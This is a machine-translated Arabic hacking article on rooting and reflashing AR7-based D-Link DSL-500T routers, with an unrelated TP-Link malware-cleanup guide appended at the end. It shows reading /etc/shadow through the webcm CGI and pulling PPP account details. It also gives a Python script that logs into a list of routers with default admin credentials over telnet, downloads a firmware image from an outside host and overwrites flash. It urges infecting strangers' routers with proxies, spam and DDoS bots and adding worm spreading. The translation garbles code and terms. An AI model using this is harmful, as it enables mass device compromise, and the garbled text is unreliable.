grep، اسم المضيف، id، ifconfig، init، insmod، kill، ln، تسجيل الدخول، ls، lsmod، mkdir،
modprobe، mount، mv، passwd، ping، ps، pwd، إعادة التشغيل، rm، rmmod، الطريق، sh، Sleep،
مزامنة، قطران، اختبار، tftp، لمس، صحيح، tty، umount، wget، whoami، نعم
المجموعة معقولة جدًا، وهي كافية للبحث العادي وتنفيذ الأفكار.
بعد ذلك، استيقظ الاهتمام بإصدار النواة:
# القط /بروك/الإصدار
إصدار Linux 2.4.17_mvl21-malta-mips_fp_le (root@xy) (إصدار دول مجلس التعاون الخليجي 2.95.3)
20010315 (release/MontaVista)) #1 الخميس 28 ديسمبر 05:45:00 بتوقيت وسط أمريكا 2006
كمرجع: MontaVista هو توزيع يهدف إلى تضمينه
أنظمة. توفر الغالبية العظمى من الشركات المصنعة لمعدات الشبكات
الأفضلية لهذا النظام. ويمكن العثور عليها أيضًا على الأجهزة الأخرى، على سبيل المثال، في
الكتب الإلكترونية أو الهواتف المحمولة.
# القط / الخ / الإصدارات
العميل=DLinkRU
الموديل=DSL-500T
الإصدار=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
المجلس = AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
المعالج
: 0
نموذج وحدة المعالجة المركزية
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
تعليمات الانتظار: لا
توقيت ميكروثانية: نعم
ناقل المقاطعة الإضافية: نعم
نقطة مراقبة الأجهزة: نعم
استثناءات VCED: غير متوفرة
استثناءات VCEI: غير متوفرة
AR7 عبارة عن شريحة ثنائية النواة تم تطويرها بواسطة شركة Texas Instruments. هو
يحتوي على جهاز توجيه ADSL متكامل على شريحة واحدة تدعم معايير ADSL1،
ADSL2، ADSL2 +. استنادًا إلى معالج RISC عالي الأداء MIPS 4KEc، مع
تردد الساعة 175 أو 233 (حسب تكنولوجيا الإنتاج: 18 ميكرون
أو 13 ميكرومتر). تحتوي الشريحة على واجهتين UART على متنها، إحداهما (UART_A)
تستخدم لإخراج معلومات تصحيح الأخطاء، بالإضافة إلى واجهة EJTAG التي تخدم
لتصحيح الأخطاء (البرامج الثابتة) ذاكرة فلاش. سيتم مناقشة استخدام هذه الواجهات
الموصوفة أدناه.
أخيرًا، نظرت إلى معلومات الذاكرة:
# القط /proc/mounts
/dev/mtdblock/0/squashfs ro 0 0
لا شيء /dev devfs rw 0 0
بروك /بروك بروك رو 0 0
رامفس /فار رامفس رو 0 0
# القط /proc/mtd
ديف: الحجم يمحو الاسم
مليون دينار 0: 0034f000 00010000 "MTD0"
MTD1: 00090f70 00010000 "MTD1"
مليون دينار2: 00010000 00002000 " مليون دينار2"
MTD3: 00010000 00010000 "MTD3"
MTD4: 003e0000 00010000 "MTD4"
وبطبيعة الحال، دون أن ننسى عناوين الكتلة:
# القط /proc/ticfg/env | grep مليون دولار
MTD0 0x900a1000,0x903f0000
مليون دولار 1 0x90010090,0x900a1000
مليون دينار بحريني 0x90000000,0x90010000
MTD3 0x903f0000,0x90400000
MTD4 0x90010000,0x903f0000
مما سبق يتبين أن ذاكرة الفلاش (/dev/mtdblock) تحتوي على 5 كتل:
مليون دولار0- صورة نظام الملفات SquashFs. هذا ملف خاص
نظام مضغوط و للقراءة فقط. ل
يتم استخدام خوارزمية الضغط gzip، ولكن في هذه الحالة - LZMA (نسبة الضغط
أعلى). حجم هذه الكتلة هو 4 ميجابايت.
مليون دينار بحريني1- تحتوي هذه الكتلة على نواة MontaVista المضغوطة بخوارزمية LZMA
الحالة، حجم الكتلة 600 كيلو بايت.
مليون دينار بحريني2- يقوم Bootloader ADAM2 بتحميل النواة أيضًا
خدمة خادم FTP للانتعاش والوميض. سيكون هناك المزيد من التفاصيل حول هذا الموضوع
وذكر كذلك. حجم الكتلة هو 64 كيلو بايت.
مليون دينار بحريني3- مقسمة بين بيانات التكوين والبيئة
(متغيرات البيئة)، والتي يمكنك الاطلاع عليها في /proc/ticfg/env.
توجد بيانات التكوين في /etc/config.xml. الوسيط بين الملفات
النظام، كتلة التكوين مغلقة (مثل كل cm_*، control، o
لهم لاحقا) برنامج cm_logic. حجم هذه الكتلة هو أيضًا 64 كيلو بايت.
مليون دينار4- يحتوي هذا على توقيع البرنامج الثابت والنواة وصورة الملف
أنظمة. يتم استخدام هذه الكتلة عند تحديث البرنامج الثابت عبر واجهة الويب.
في البداية يتم تخزينه في هذه الكتلة، ثم يتم فحص المجموع الاختباري
وإذا كان مناسبًا، يقوم بالتسجيل في مكانه الجديد.
ذاكرة الوصول العشوائي (16 ميجابايت في هذا النموذج، ولكن ADAM2 في هذا النموذج
يرى 14 ميغابايت فقط، ويتم علاجه عن طريق التحديث)، وتم تثبيته على الدليل /var، وملفه
يمكنك استخدامه بسهولة لأغراضنا:
# حر
إجمالي المخازن المؤقتة المشتركة المجانية المستخدمة
ميم: 14276 10452 3824 0
دعونا لا ننسى الاطلاع على قائمة العمليات. من تلك المثيرة للاهتمام الكامنة هنا
الشياطين: thttpd - خادم الويب؛ dproxy - التخزين المؤقت لطلبات DNS للخادم الوكيل؛ com.ddnsd
- شيطان DNS؛ pppd... هو البرنامج الخفي الفعلي الذي ينفذ الاتصال عبر البروتوكول
PPP، وفي المعلمات نرى معلومات الحساب. لذلك، إذا لم يكن جهاز التوجيه
يتظاهر بأنه خرطوم (قراءة – وليس في وضع الجسر)، فيمكنك ذلك
من السهل الحصول على حساب.
تم إغلاق برامج cm_* ويتضمن كود المصدر بالفعل
تم تجميعها (تم تطوير هذه البرامج أيضًا بواسطة شركة Texas Instruments، على D-Link
لا فائدة من الخلاف حول عدم الالتزام بالتراخيص).
cm_logic- برنامج يتحكم في منطق النظام من خلاله
التكوين قيد التقدم؛ يقوم بمزامنة /etc/config.xml مع
الجزء المقابل من محتويات /dev/ticfg (يشير إلى mtd3).
cm_cli- الواجهة سطر الأوامرللإدارة والتكوين
أنظمة. على سبيل المثال، يتم إجراء إعدادات الاتصال من خلال هذه الواجهة.
cm_pc- إطلاق ومراقبة العمليات والاتصالات مع القواعد
(على سبيل المثال، تشغيل البرنامج كبرنامج خفي؛ تتضمن القواعد أيضًا معلومات حول
المنافذ المفتوحة) الموضحة في /etc/progdefs.xml؛ الأحمال مباشرة بعد ذلك
حبات.
webcm- واجهة CGI، المتسربة، على سبيل المثال تسمح لك بالنظر إلى /etc/shadow،
ببساطة عن طريق الوصول إلى URL.
http://192.168.1.1/../../../etc/shadow
لم أحصل على أي شيء، thttpd ليس بهذه البساطة، ولكن إذا كان الأمر كذلك:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
شيء آخر. ويمكن استخدام هذا لجمع المعلومات إذا لم يكن هناك إمكانية الوصول إليها
ssh/telnet، ولكن هناك إمكانية الوصول إلى واجهة الويب.
Firmwarecfg- يستخدم لتحديث البرامج الثابتة عبر واجهة الويب. عند المدخل
في هذا البرنامج، يتم نقل الصورة بطلب POST من واجهة الويب، ويتم ذلك بالفعل
يعيد التوجيه إلى ذاكرة الفلاش، بعد التحقق المجموع الاختباريصورة.
في هذه المرحلة، تم الانتهاء من جمع المعلومات الأولية، وحان الوقت للانتقال إلى المعلومات الحاسمة
الإجراءات.
تثبيت أدوات التطوير وتجميع البرامج الثابتة
البرامج الثابتة أجهزة التوجيه دي لينك(وجميع الأنظمة الأخرى المستندة إلى GNU/Linux)
موزعة بموجب ترخيص GPL، يمكنك الحصول عليها من الموقع الرسمي
خادم بروتوكول نقل الملفات. في الواقع، يمكنك اختيار أي من قائمة البرامج الثابتة المقترحة،
إنهم متماثلون (فيما يتعلق بسلسلة T). يتضمن التسليم الكود المصدري للنواة، والبيئة،
الأدوات وسلسلة الأدوات اللازمة لتطوير/تجميع الأدوات الموجودة
البرامج. يجب تفكيكه إلى الجذر وإضافته إلى متغير البيئة
مسار PATH إلى دليل سلة الأدوات:
أدوات القطران $ xvf.tgz
مسار التصدير $=$PATH:/opt/
الآن، لتجميع البرامج الثابتة الخاصة بك، انتقل إلى الدليل
مع رموز المصدروتنفيذ نفس هذا الأمر.
$ cd DSL/TYLinuxV3/src && make
سيكون هناك الكثير من الأسئلة المطروحة حول تمكين دعم الجهاز (الأفضل
أجب عليهم بالإيجاب). بعد اكتمال التجميع، في دليل TYLinuxV3/images
سيتم إنشاء صور البرامج الثابتة. يمكنك أيضًا تشغيل برنامج نصي يحمل نفس اسمك
نموذج من الدليل /TYLinuxV3/src/scripts.
بضع كلمات حول نقل الملفات بين جهاز التوجيه والكمبيوتر. الأول
الطريقة التي استخدمتها هي القدرة على نقل الملفات عبر بروتوكول SSH،
باستخدام برنامج scp لهذا الغرض. ولكن بعد ذلك بقليل اكتشفت أن mc (Midnight
Commander) لديه أيضًا القدرة على الاتصال عبر SSH (اللوحة -> اتصال Shell).
وبدلاً من ذلك، يمكنك إعداد خادم ويب أو خادم FTP في مكان عملك. في وقت لاحق أنا
لقد أعطيت الأفضلية لخادم الويب، لأنه يعمل بشكل أسرع. لقد قمت بتثبيته
thttpd، صغير وسريع، تمامًا كما هو الحال في جهاز التوجيه. نطلقه في المنزل ونقوم بتنزيله على
ملف جهاز التوجيه، بعد الانتقال إلى الدليل /var (كما ذكرنا
في وقت سابق، متاح للتسجيل).
$ thttpd -g -d ~/ForRouter -u user -p 8080
# قرص مضغوط / فار
# وجيت http://192.168.1.2/file
لتنزيل ملف من جهاز التوجيه، يمكنك أيضًا رفع خادم الويب:
# thttpd -g -d /var -u root -p 8080
يرجى ملاحظة أنه إذا كنت تريد تنزيل ملف قابل للتنفيذ من جهاز التوجيه، فيجب عليك ذلك
إزالة حقوق الإطلاق. عند التحميل كمية كبيرةالملفات من جهاز التوجيه
من الأفضل استخدام mc، فلن تحتاج إلى نسخ الملفات إلى /var أولاً و
قم بإزالة الحقوق، ثم قم بحذف هذه الملفات لتحرير مساحة. بشكل عام، هذه المسألة
الذوق، اختر أي خيار مناسب لك.
إنشاء البرنامج الخاص بك
لنبدأ بالطبع بالبرمجة الكلاسيكية - HelloWorld. بعض تلك الخاصة
لا توجد قواعد. نص البرنامج مألوف بشكل مؤلم:
#يشمل
#يشمل
إنت الرئيسي (باطل)
{
printf("Mate.Feed.Kill.Repeat.");
العودة 0؛
}
نقوم بتجميع (يجب تحديد المسار إلى سلسلة الأدوات في متغير البيئة
طريق):
$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s الجحيم
# قرص مضغوط / فار
# chmod +x الجحيم
# ./جحيم
و... لن يحدث شيء، أو سيظهر إشعار المسار لم يتم العثور عليه. ما هذا
قضية؟ لقد تحدثت بالفعل عن cm_pc - يقوم هذا البرنامج بتشغيل برامج أخرى
وفقًا للقواعد الموضحة في /etc/progdefs.xml. والآن حان الوقت
تعديل وفلاش صور نظام الملفات.
تعديل نظام الملفات
لتعديل نظام الملفات، عليك أولاً أن تقوم بذلك
فك. كما ذكرت سابقًا، نظام الملفات هنا هو SquashFs مع تصحيح LZMA.
تتضمن حزمة تطوير البرامج الثابتة فقط برنامج mksquashfs (لإنشاء
الصورة)، unsquashfs (للتفريغ) مفقود. ولكن لا يهم، كل شيء متاح
على موقع نظام الملفات، نحتاج إلى الإصدار الأول. من خلال تطبيق تصحيح LZMA و
بعد جمع المرافق، نضعها جانبا مكان مناسب. أولا نحصل على الصورة
نظام الملفات من جهاز التوجيه:
# cat /dev/mtdblock/0 > /var/fs.img
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs
الآن يمكنك تعديله كما تريد، ويمكنك أن ترسل لنا FuckTheWorld إلى
/bin وأضف قاعدة للتشغيل في /etc/progdefs.xml.
$ cp مرحبًا unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml
ونضيف هذا (بين العلامات
حفظ وحزم مرة أخرى:
$ mksquashfs unpacked_fs my_fs.img -noappend
يرجى ملاحظة أن صورة نظام الملفات يجب ألا تتجاوز
أحجام مقبولة. إذا شعرت بالرغبة في تجربة شيء ما بشكل عاجل، ولم يحدث ذلك
مناسبًا، قم بإزالة أي شيء "غير ضروري" من الصورة مثل grep أو whoami أو
استخدم الباكر الملفات القابلة للتنفيذ UPX. الآن قم بتنزيله على جهاز التوجيه
الصورة والانتقال إلى القسم التالي.
تسجيل صورة نظام الملفات
طريقة وميض جهاز التوجيه بسيطة للغاية؛ فهي تتضمن الوصول إلى الجهاز
/dev/mtdblock/*. لذلك، ملء جهاز التوجيه مع أي بطريقة مريحةصورة الملف
النظام وتنفيذ هذا الإجراء البسيط:
# cat my_fs.img > /dev/mtdblock/0 && إعادة التشغيل
# cp my_fs.img /dev/mtdblock/0 && إعادة التشغيل
بعد مرور بعض الوقت، عند اكتمال عملية التسجيل، سيتم إعادة تشغيل جهاز التوجيه، و
سوف تصبح التغييرات نافذة المفعول. دعونا نحاول تشغيل مثالنا:
# جحيم
زميل، تغذية، قتل، كرر.
طرق الاسترداد في حالة الفشل
قبل تحديث جهاز التوجيه الخاص بك باستخدام "حرف" أكثر جدية، يجب عليك معرفة كيفية القيام بذلك
للعمل في الحالات الحرجة عندما يرفض جهاز التوجيه
حمولة. لا توجد حالات ميؤوس منها. يأتي خادم ADAM2 FTP للإنقاذ. ل
أولاً، يجب عليك تشغيل عميل FTP على عنوان ADAM2 IP، والذي يمكنك التجسس عليه
في /proc/ticfg/env (المعلمة my_ipaddress).
$فتب 192.168.1.199
220 خادم FTP ADAM2 جاهز.
530 الرجاء تسجيل الدخول باستخدام المستخدم وPASS.
من أجل الوضوح، يمكنك تشغيل وضع التصحيح، ثم كل شيء
المعلومات وجميع استجابات FTP:
تسجيل الدخول/كلمة المرور - adam2/adam2. عملية الوميض بسيطة للغاية. لتبدأ
قم بتبديل جلسة FTP إلى الوضع الثنائي:
بروتوكول نقل الملفات> اقتبس وسائل الإعلام FLSH
الآن نرسل، على سبيل المثال، صورة لنظام الملفات ونشير إلى الموقع
الوجهات:
ftp> ضع fs.img "fs.img mtd0"
ننتظر نهاية التسجيل، ونعيد تشغيل جهاز التوجيه، ونخرج من الجلسة:
بروتوكول نقل الملفات> اقتباس إعادة التشغيل
بروتوكول نقل الملفات> إنهاء
الجميع! كما ترون، لا يوجد شيء معقد، الآن إذا حدث خطأ ما، أنت
يمكنك دائمًا إصلاح الوضع.
لسهولة الاستخدام، يجب عليك إعطاء عنوان IP عادي، تمكينه
التحميل التلقائي (حتى لا يتعارض مع إعادة الضبط) وزيادة الوقت قليلاً
في انتظار الاتصال قبل تحميل النواة. يتم تخزين كل هذه المعلمات في
متغيرات البيئة، نعم فرق خاصة FTP ADAM2: GETENV وSETENV (لـ
الحصول على المتغير وتعيينه على التوالي). في جلسة FTP أدخل ما يلي
الأوامر:
بروتوكول نقل الملفات> التحميل التلقائي SETENV،1
ftp> SETENV autoload_timeout,8
ftp>SETENV my_ipaddress,192.168.1.1
بروتوكول نقل الملفات> اقتباس إعادة التشغيل
بروتوكول نقل الملفات> إنهاء
تتم إعادة تشغيل جهاز التوجيه ويمكنك الوصول إلى ADAM2 على 192.168.1.1:21. لو
ستكون هناك رغبة في إعادة تحميل صورة النواة، وسوف يرفض النواة التمهيد، FTP
سوف تبدأ من تلقاء نفسها. قبل وميض الصور المعدلة، تأكد من ذلك
حفظ تلك الحالية للاستعادة. بشكل عام، يمكنك تغيير متغيرات البيئة
وعبر /proc/ticfg/env، أردت فقط أن أخبركم المزيد عن العمل مع FTP.
# صدى my_ipaddress 192.168.1.1 > proc/ticfg/env
يمكنك التحقق من التغييرات مثل هذا:
# القط /proc/ticfg/env | grep my_ipaddress
ماذا تفعل إذا كنت تريد محاولة إعادة تحميل ملفات أداة تحميل التشغيل، وكيف
ماذا تفعل في حالة الفشل؟ أو جهاز التوجيه لسبب ما لا يبدأ، و
لا يمكن الوصول إلى ADAM2؟ يوجد حل - JTAG، أو بالأحرى، تحتوي هذه الشريحة على EJTAG
(نسخة موسعة). هذه واجهة لتصحيح الأخطاء/البرمجة داخل الدائرة.
للاتصال بهذه الواجهة نحتاج إلى منفذ LPT للكمبيوتر،
موصلات و 4 مقاومات. المخطط بسيط.
أسارع إلى الإشارة إلى أن البرامج الثابتة عبر JTAG ليست مهمة سريعة، وسوف يستغرق الأمر الكثير
الكثير من الوقت. لذا يجب استخدامه فقط لاستعادة أداة تحميل التشغيل،
حتى لو لم ينجح. للتواصل عبر JTAG، يجب عليك استخدام خاص
البرنامج، على سبيل المثال UrJTAG. فيما يلي مثال لكيفية عمل هذه الواجهة.
إعداد الاتصال:
jtag> كابل موازي 0x378 DLC5
jtag> كشف
كشف ذاكرة الفلاش:
jtag> كشف الفلاش 0x30000000 1
قراءة ذاكرة فلاش:
jtag> الملف التمهيدي 0x30000000 0x400000 fullflash.img
الكتابة إلى الذاكرة (محمل التشغيل):
jtag> flashmem 0x30000000 adam2.img
من المفيد أيضًا التعرف على واجهة UART (لقد وعدت سابقًا بالحديث عنها). في
تقارير UART_A، أي أنها تسجل أداة تحميل التشغيل (في مرحلة مبكرة من التمهيد من
يمكنك التواصل معه) وجوهر. عند كتابة النوى المعدلة هذا
لا غنى عنه لتصحيح الأخطاء. UART - جهاز استقبال/إرسال عالمي غير متزامن
(جهاز الإرسال والاستقبال غير المتزامن العالمي) موجود دائمًا تقريبًا
ميكروكنترولر.
دائرة المحول بسيطة للغاية. على أساس شريحة واحدة فقط -
محول مستوى TTL: MAX232 لـ COM وFT232R لـ USB. الدوائر الدقيقة
إنها شائعة جدًا ولن تكون هناك مشاكل في الشراء.
يتم تجميع الدائرة على اللوح (والتي يمكن وضعها بسهولة في علبة
موصل منفذ COM) في 20 دقيقة ويجلب الكثير من الفوائد. على سبيل المثال، عند التصحيح
النواة هي حل لا يمكن الاستغناء عنه على الإطلاق. ماذا لو كانت الإلكترونيات مشكلة؟ مخرج
هي أسلاك USB للهواتف القديمة، فهي تحتوي فقط على محول
وارت - يو اس بي.
بعض أفكار التوزيع
يعد وجود الوكيل/sox الخاص بك على جهاز التوجيه الخاص بشخص آخر أمرًا رائعًا. تماما مثل البريد العشوائي
جهاز التوجيه لجميع البروتوكولات. هذا ليس جهاز كمبيوتر يعمل بنظام Windows، والذي
يعاد ترتيبها كل شهر :). غالبًا لا يتم تغيير أجهزة التوجيه أو إعادة تحميلها. نعم و
من غيرنا قد يفكر في فكرة إصابة جهاز التوجيه؟
لا تنس أننا نتحكم في كل حركة المرور الواردة من المستخدم/الشبكة. للمزيد
في أجهزة التوجيه القوية، من الممكن بالفعل تعليق روبوت DDOS. إخفاء الملف/إخفاء العملية،
اعتراض الكتابة إلى كتل mtd دون الكتابة فوق برنامجنا - كل ذلك
أيا كان!
لنفترض أنك على وشك البدء في كتابة برنامج جاد لجهاز التوجيه.
يعد التصحيح الجيد جدًا أمرًا مهمًا، وربما يتعين عليك القيام بذلك عدة مرات
إعادة كتابة/استعادة الصور... هذا احتمال محزن للغاية. حتى الأيدي
إسقاط قليلا، إذا كنت تأخذ في الاعتبار أيضا أن ذاكرة فلاش هي مورد إعادة الكتابة
صغير (مزيد من التفاصيل في وثائق شريحة الذاكرة)، وهناك احتمال
تدمرها. ولكن هناك طريقة للخروج! يمكن لـ Kemu محاكاة AR7! هل يمكنك أن تتخيل ماذا
هل يوفر فرصًا وراحة غير محدودة؟ الآن لا شيء يوقفنا
اكتب شيئا رائعا بشكل لا يصدق!
لذا. لقد كتبت برنامجًا، واختبرته على أجهزة التوجيه الخاصة بك أو على جهاز توجيه أو جهازين آخرين، ولكن
لا تزال الشبكة بأكملها في المقدمة، حيث يعد إصابة الشبكة يدويًا عملاً روتينيًا، وعلى جهاز التوجيه العاشر الذي بدأته بالفعل
يلعن العالم كله، ويطفو في عينيك خيوط "القط" و"mtd". دعونا نكتب
برنامج لأتمتة هذه الإجراءات الروتينية. لقد اخترت لغة بايثون.
خطة العمل هي كما يلي:
- إنشاء قائمة بأجهزة التوجيه، على سبيل المثال، باستخدام nmap؛
- يجب أن يأخذ البرنامج النصي عناوين IP من القائمة بالترتيب، ويدخل من خلالها
telnet مع تسجيل الدخول/كلمة المرور القياسية؛ - ثم نفس الخطوات: رفع الصورة المعدلة،
إعادة الكتابة، إعادة التشغيل.
#!/usr/bin/env بيثون
#تشفير=UTF-8
استيراد telnetlib والوقت
الخادم = "http://anyhost.com/fs.image"
للعنوان المفتوح ("iplist.txt"):
التلنت = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("تسجيل الدخول:")
وقت النوم(5)
telnet.write("المشرف\n")
telnet.read_until("كلمة المرور:")
telnet.write("المشرف\n")
telnet.read_until("#")
telnet.write("cd /var && wget" + الخادم)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("إعادة التشغيل")
تلنت.إغلاق()
منطق البرنامج النصي بعيد جدًا عن المثالية، والآن سأشرح السبب. ل
أولاً، يجب عليك التحقق من إصدار البرنامج الثابت/النواة وطراز جهاز التوجيه، لأنه قد يكون هناك
اختلافات خطيرة في العمل. بعد ذلك، بدلا من الفراغات الثابتة، يجب عليك التنزيل
صورة نظام الملفات من جهاز التوجيه، وفك ضغطها وتعديلها وإرسالها
خلف. سيؤدي هذا إلى القضاء على المشاكل التي تنشأ مع التوافق في مختلف
النماذج/إصدارات البرامج الثابتة، لأن استقرار التشغيل هو أهم شيء بالنسبة لك.
أيضًا، يمكن أن يكون للفيروس وظائف الدودة، ويمكنك دائمًا القيام بذلك إذا كنت ترغب في ذلك
إرفاق ماسح ضوئي للشبكة، والقوة الغاشمة لـ RDP والميزات المشابهة له.
هناك طريقة رائعة أخرى لنشرها. لا شيء يمنعك من الكتابة
برنامج لنظام التشغيل Windows، والذي سيكون معك (أو قم بتنزيله من جهازك
server) صورة نظام الملفات وإصابة جهاز التوجيه بها، إذا كان موجودًا.
قم بتوزيع هذا البرنامج بجميع الطرق "القياسية": محركات الأقراص القابلة للإزالة،
استغلال البرامج، إصابة البرامج الأخرى... من خلال الجمع بين هذه الأساليب،
يمكنك خلق جائحة خطير. فقط تخيل هذه الصورة - بعد كل شيء
مثل هذه الأجهزة موجودة في كل مكان.
حماية جهاز التوجيه
بعد أن استخرجت كل هذا، فكرت: كيف يمكنني حماية جهاز التوجيه؟ وبعد ذلك، كما ترى، و
سأصل إلى هناك بنفسي. الخطوة الأولى هي تغيير كلمة مرور المستخدم إلى كلمة مرور أكثر تعقيدًا و
طويل (بحد أقصى 8 أحرف)، وتغيير اللافتات وتحية الخدمة
(محرر سداسي عشري، أو يفضل إعادة ترجمة البرامج) بالترتيب
تعذر على nmap أو الماسحات الضوئية الأخرى تحديد إصدارات الخدمة.
يجب عليك أيضًا تغيير المنافذ التي تتدلى عليها الشياطين. يتم ذلك عن طريق
التعديلات على progdefs.xml. اقتل telnet (أسهل طريقة لتخمين كلمة المرور، نعم
والبروتوكول غير محمي، لماذا نحتاج إليه)، قم بتمكين جدار الحماية، واسمح بالاتصال
الوصول إلى الخدمات فقط من عنوان IP أو MAC الخاص بك. استخدم أيضًا جدار الحماية
لحماية الشبكة أو الكمبيوتر، فليس من قبيل الصدفة وجودها. الإعداد الذكي
ستساعدك القواعد دائمًا على حماية نفسك.
خاتمة
تم بناء العديد من أجهزة توجيه D-Link والأجهزة المماثلة الأخرى، وليس فقط
شريحة AR7، وتشمل القائمة Acorp وNetGear وLinksys وActionec... تمامًا
يحظى AR7 بشعبية كبيرة مع MontaVista. ويترتب على ذلك، باستخدام نفسه
Toolchain، فيمكنك تنفيذ الخطوات الموضحة في المقالة دون أي مشاكل.
فكر في الأمر: بالإضافة إلى الأفعال الضارة، يمكنك أيضًا القيام بشيء مفيد/ممتع لنفسك
وغيرها (أنا لا أجادل، لا يمكن استبدال متعة القرصنة، ولكن لا يزال).
يمكنك إنشاء البرامج الثابتة الخاصة بك، على سبيل المثال، أجهزة توجيه أكثر قوة
تنزيل/توزيع السيول... تحتوي جميع الطرز على واجهة USB 1.1، ولكن في الطرازات الأصغر سنًا
نماذج غير ملحوم. أضف وحدة USB وبرنامج تشغيل نظام الملفات إلى النواة،
قم بتزويد جهاز التوجيه بذاكرة فلاش - وفي النهاية ستحصل على شيء كهذا تخزين الشبكةل
أموال صغيرة. هناك الكثير من الخيارات، ولكن يجب أن تنشأ الأفكار بالآلاف - لا
تحد نفسك، وخلق وخلق!
لحماية نفسك من Trojan.Rbrute Trojan الذي يهاجم أجهزة المودم/أجهزة التوجيه TP-link، يتعين عليك اتباع بعض الشروط البسيطة. ينتشر الفيروس عن طريق مسح القوة الغاشمة لعناوين IP في النطاق n، وبعد ذلك تبدأ طريقة القوة الغاشمة في تخمين كلمة المرور. تتعرض جميع الطرز الشائعة لأجهزة توجيه Tp-link تقريبًا للهجوم. يشق طروادة طريقه إلى إعدادات الجهاز، ويقوم بتغيير عناوين DNS الخاصة بالموفر إلى عناوين المهاجمين.
يكون جهاز التوجيه الخاص بك مصابًا إذا:
عند محاولة تسجيل الخروج أيسواء كان ذلك remont-sro.ru أو خدمة Gmail.com، يتم فتح موقع تنزيل مزيف جوجل كرومأو غيرها من الموارد المشبوهة. في البداية، كانت عملية إعادة التوجيه تعمل فقط مع طلبات المستخدمين التي تحتوي على الكلمات Facebook أو Google، ولكن الآن يستجيب حصان طروادة لأي منها. تظل الإشارة الموجودة على المودم كما هي، وتضيء كلمة "الإنترنت" بشكل ثابت، ويظهر الكمبيوتر أن الاتصال قد اكتمل، وأن التفويض قد اكتمل، لكن الإنترنت نفسه لا يعمل، فهو يعيد التوجيه فقط إلى صفحات الإعلانات و/أو التنزيلات المزيفة
النقطة 1. إعادة الضبط. إعادة تكوين المودم
تم إعداد التعليمات بواسطة ماريا كورتشاجينا، المتخصصة في GTP TsOO
إذا لم تتمكن من الوصول إلى إعدادات المودم عبر 192.168.1.1، فحاول القيام بذلك عبر العنوان 192.168.42.1
في هذه الصفحة يتم الإشارة إلى الإعدادات فقطلخدمة الانترنت . لإعداد IP-TV وWI-FI، قم بتنزيل الأدلة الكاملة
النسخة الروسية - http://yadi.sk/d/JC6l6FPVRbU9P
النسخة الانجليزية - http://yadi.sk/d/j6Ly7bA4RbU8r
1. لإعادة ضبط إعدادات المودم بشكل صحيح، اضغط باستمرار على الزر باستخدام إبرة/لصق/عود أسنان إعادة ضبطفي استراحة صغيرة. استمر لمدة 5 إلى 15 ثانية حتى تختفي الإشارة الموجودة على الجهاز. يجب أن تنطفئ الأضواء تمامًا كما هو الحال بعد إعادة تشغيل جهاز التوجيه العادي.
2. للتهيئة، يجب أن يكون المودم متصلاً بكابل بأي منفذ LAN؛ ولا يتم تكوينه عبر اتصال Wi-Fi.
3. قم بتسجيل الدخول عبر المتصفح إنترنت إكسبلوررإلى واجهة جهاز التوجيه، على العنوان: 192.168.1.1. سيتم فتح مربع حوار. في حقلي "اسم المستخدم" و"كلمة المرور"، أدخل admin/admin على التوالي. سوف تفتح الصفحة الرئيسيةجهاز التوجيه (انظر أدناه)
في هذه الصفحة سترى الإعدادات الموجودة بالفعل:
4. قبل البدء في إعداد جهاز التوجيه، تحتاج إلى حذف جميع الإعدادات التي تم إنشاؤها مسبقًا؛ للقيام بذلك، انتقل إلى القسم "إعدادات الواجهة" -> "الإنترنت"، حدد "القناة الافتراضية" - PVC0، في أسفل الصفحة انقر فوق الزر "حذف". نقوم بذلك مع كل قناة افتراضية (هناك 8 قنوات إجمالاً).
ونتيجة لذلك، هذا ما يجب أن يحدث (انتقل إلى القسم مرة أخرى "ولاية"):
5. اذهب الآن إلى القسم "إعدادات الواجهة"، ثم حدد قسمًا فرعيًا "إنترنت"(انظر الصورة أدناه). نحدد المعلمات كما في لقطة الشاشة أدناه (المستخدم وكلمة المرور: rtk)، ثم نحفظ جميع المعلمات بالنقر فوق الزر "حفظ".
هذا يكمل الإعداد لوضع PPPoE.
النقطة 2. تغيير كلمة مرور تسجيل الدخول لجهاز التوجيه
لتغيير كلمة المرور الخاصة بك، انتقل إلى القسم "تشغيل الجهاز"، ثم "إدارة"، حيث يتم بالفعل تغيير كلمة المرور لتسجيل الدخول إلى جهاز التوجيه (ابتكر كلمة مرور معقدة) (انظر لقطة الشاشة أدناه). ثم اضغط على الزر "يحفظ"
البند 2.5 قائمة كلمات المرور غير الموصى بها للدخول إلى جهاز التوجيه
111111
12345
123456
12345678
abc123
مسؤل
المسؤول
كلمة المرور
com.qwerty
جذر
com.tadpassword
Trustno1
مستهلك
تنين
gizmodo
iqrquksm
com.letmein
"يعرف" الفيروس بالفعل كل كلمات المرور هذه وسيستغرق تخمين كلمة المرور ثانية واحدة. يجب ألا تتكون كلمة المرور من أرقام أو أحرف فقط. يجب أن تكون الأحرف الخاصة (التجزئة والعلامات النجمية والنسب المئوية وعلامات الاقتباس) والأحرف ذات الحالة المختلفة (الأحرف الكبيرة والصغيرة) موجودة. كلما كانت كلمة المرور أكبر وأكثر تنوعًا، كلما استغرق الأمر وقتًا أطول لفرضها (إذا حدث ذلك على الإطلاق).